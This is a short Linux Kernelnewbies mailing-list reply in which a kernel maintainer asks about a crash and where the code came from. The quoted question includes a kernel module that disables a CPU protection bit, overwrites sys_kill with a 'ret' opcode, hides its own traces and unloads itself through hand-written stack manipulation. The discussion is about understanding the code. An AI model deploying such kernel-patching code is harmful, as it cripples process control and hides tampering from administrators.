On Sun, Jun 26, 2016 at 09:35:55AM +0000, Manavendra Nath Manav wrote:
> Can someone explain the following kernel module code. I'm not familiar with x86
> assembly so I have problems understanding this part. Also it seems this code is
> able to modify the kernel stack.
>
> /******************start****************/
>
> #include <linux/module.h>
>
> MODULE_LICENSE("GPL");
>
> int __init init(void) __attribute__((noreturn))
> {
>     unsigned long long cr0 = read_cr0();
>     write_cr0(cr0 & ~(1 << 4)); /* Clear Extension Type (ET) bit */
>     *(unsigned char *)sys_kill = 0xc3; /* opcode for "ret" */
>     write_cr0(cr0);
>
>     /* Optional code ahead to hide traces of this module. */
>     __this_module.refcnt = 1;
>     __this_module.state = MODULE_STATE_LIVE;
>
>     asm
>     (
>         "mov %0, %%rsp\n\t"
>         "mov %1, %%rdi\n\t"         /* name = __this_module.name */
>         "xor %%rsi, %%rsi\n\t"      /* flags = 0 */
>         "jmp sys_delete_module\n\t" /* call delete_module(name, flags) */
>         :: "r"(current->stack + THREAD_SIZE - sizeof(struct pt_regs) - 8), "r"(__this_module.name) :
>     );
> }
>
> void __exit exit(void)
> {
>     return;
> }
>
> /*******************end*****************/

What exactly was the crash? And where did you find this kernel module source from?

greg k-h

_______________________________________________
Kernelnewbies mailing list
Kernelnewbies@xxxxxxxxxxxxxxxxx
http://lists.kernelnewbies.org/mailman/listinfo/kernelnewbies